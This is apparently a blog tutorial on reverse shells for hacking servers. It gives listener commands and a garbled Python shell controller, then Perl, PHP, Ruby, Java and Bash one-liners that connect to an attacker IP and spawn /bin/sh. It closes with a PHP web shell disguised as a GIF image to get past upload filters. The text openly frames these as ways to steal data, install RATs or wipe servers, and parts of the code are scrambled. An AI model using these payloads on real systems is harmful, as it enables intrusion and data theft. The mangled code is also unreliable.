A reverse shell is a hacking vulnerability in which the hacker executes .php codes or an executable file in which he gets access to the shell of the target system. Then he can install rats or steal any info regarding his banks or the info regarding the users of the websites and its services. When attempting to compromise a server, an attacker may try to exploit a command injection vulnerability on the server system. The injected code will often be a reverse shell script to provide a convenient command shell with or without root access for further malicious activities such as a huge data breach, complete erase of the server, etc. Prerequisites To listen to a reverse shell in Linux, you need to have netcat installed. But in Windows, you need to have ncat which comes installed with nmap suite in order to run listening on Linux. And, in Windows you need to execute the following code to listen for reverse shell. linux
nc –nlvp <port-used-by-u>

windows
ncat.exe –nlvp <port-used-by-u> Programming languages used Literally, any programming language can be used from high level to low-level anyone can be used but the most common are:- python java Perl ruby PHP bash python: Python is a really fast-growing programming language and it has its involvement in every field starting from websites to desktop applications it is used in every place. so some times after enumeration if you find you can use python in the server you can use the code given below to start a reverse shell connection. socket

SERVER_HOST = SERVER_PORT = # send ( kb) a time ( buffer size)
BUFFER_SIZE = * # KB max size messages, feel free to increase
# separator string sending messages one go
SEPARATOR = # create a socket object
s = socket.socket()

# bind the socket to all IP addresses host
s.bind((SERVER_HOST, SERVER_PORT))
# make the PORT reusable
# when you run the server multiple times Linux, Address already use error will raise
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, )
s.listen( )
print(f )

# accept any connections attempted
client_socket, client_address = s.accept()
print(f )

# receiving the current working directory the client
cwd = client_socket.recv(BUFFER_SIZE).decode()
print( , cwd) True:
    # get the command prompt
    command = input(f ) not command.strip():
        # empty command # send the command to the client
    client_socket.send(command.encode()) command.lower() == :
        # the command is exit, just out the loop # retrieve command results
    output = client_socket.recv(BUFFER_SIZE).decode()
    print( , output)
    # split command output and current directory
    results, cwd = output.split(SEPARATOR)
    # print output
    print(results)
# close connection to the client
client_socket.close()
# close server connection
s.close() import "0.0.0.0" 5003 1024 1 as 1024 128 128 of for 2 in "<sep>" of this in in 1 5 "Listening as {SERVER_HOST}:{SERVER_PORT} ..." "{client_address[0]}:{client_address[1]} Connected!" of "[+] Current working directory:" while from "{cwd} $> " if continue if "exit" if break of break "output:" perl: Perl just like Python is a programming language used in web development but comparatively more used than Python. perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' In the above code instead of 10.0.0.1, you can specify your IP and in the ( $p= ) you can specify the port you prefer php: PHP is a server-side scripting language. that is used to develop Static websites or Dynamic websites or Web applications. PHP stands for Hypertext Pre-processor, which earlier stood for Personal Home Pages. PHP scripts can only be interpreted on a server that has PHP installed php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");' In the above code instead of 10.0.0.1, you can specify your IP and in the ( $p= ) you can specify the port you prefer ruby: Ruby and Python are both solid languages to use in web development. Ruby offers Ruby on Rails, which uses a Model-View-Controller (MVC) architecture. The MVC architecture is a convention to separate logic. ruby -rsocket -e 'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' In the above code instead of 10.0.0.1, you can specify your ip and in the ( $p= ) you can specify the port you prefer java: Java developers keep up with developments in the coding language, perform periodic updates of security protocols, and excellent grasp to handle data requests. r = Runtime.getRuntime()
p = r.exec([ , , ] as String[])
p.waitFor() "/bin/bash" "-c" "exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done" In the above code instead of 10.0.0.1, you can specify your IP and in the ( $p= ) you can specify the port you prefer bash: Bash is not used in the website instead used in the Linux server itself and it to the most extent very effective Bash : bash -i >& /dev/tcp/10.10.10.10/4443 0>&1 In the above code instead of 10.0.0.1, you can specify your ip and in the ( $p= ) you can specify the port you prefer Shell codes copied directly from exploit-db website. Problems while executing injecting reverse shell The main problem is how to inject the code into the website. Some methods are by embodying the code into the metadata of a picture and then uploading the image into the website. You can start a reverse shell attack but in some websites or mostly all secured websites divide the files uploaded into 2 types white tag and black tags. This means the metadata is enumerated and the upload is stopped or the websites might have a really powerful firewall or a malware detection mechanism that blocks anonymous web traffic and blocks it for good. Overcome problems To overcome the problems you need to have a lot of resources but it is very difficult to bypass the firewall until you don't know the info required so we won't include that in the article. But, there is a way to make the upload possible by adding a header in the metadata of the image. Usually, hackers use the PHP codes more than any code because of the versatility it provides and many times the code starts with .php format or header causing it to be detected and stopped so for this not to happen you need to add header  to the metadata to do that you need to follow the following codes GIPHY vim example.png GIF89a;
<?php system($_GET[‘c’]);?> #open vim and the photo file with the codes #enter the GIPHY header on the top of everything #save the above #u are ready to upload the picture into the website The GIF89a; is the GIPHY header it tells the website that it is a legit picture but you might feel the code won't work but it will work without any issue and you can listen to the shell and enumerate the server. Source The sources or his article are youtube videos and the codes are from various GitHub repos. You can always find the owner of the source code for the program in github.com And e exploit-db websit Note To effectively enumerate the web shell you must execute the /bin/bash/sh/ to properly get the bash shell to try to get the sudo or root privileges. Install any malware or see any data in any look and corner of the whole system. This is a simple tool but very effective in enumerating the system. Follow me Follow my Twitter account for the latest updates Twitter:- morpheuslord2 Instagram :- morpheuslord_9034 email:- morpheuslord@protonmail.com

Instagram

Target

Twitter

YouTube

Facts You Probably Didn't Know About The Dark Web

How to customize your hacking set-up for the most affordable price

Personal Website

LinkedIn

HuggingFace

Github

Cybersecurity Engineer Intern

Researcher & Developer

Offensive Security Engineer Intern

CyberSecurity Engineer

Too Long; Didn't Read

How to Run Reverse Shell for Hacking in Linux

How to Run Reverse Shell for Hacking in Linux

About Author

Comments

TOPICS

THIS ARTICLE WAS FEATURED IN

Related Stories

All the Methods You Can Use to Hack into a Website

108 Stories To Learn About Cybersecurity Tips

10 Ways to Mitigate Cybersecurity Risks and Prevent Data Theft

10 Tips For Securing Zoom Meetings

10 Things I Did To Increase CloudTrail Logs Security

10 Steps to Ensuring Cyber Security for a Small Business

All the Methods You Can Use to Hack into a Website

108 Stories To Learn About Cybersecurity Tips

10 Ways to Mitigate Cybersecurity Risks and Prevent Data Theft

10 Tips For Securing Zoom Meetings

10 Things I Did To Increase CloudTrail Logs Security

10 Steps to Ensuring Cyber Security for a Small Business

Light-Mode

Classic

Newspaper

Minty

Dark-Mode

Neon Noir

Minty

HN StartUps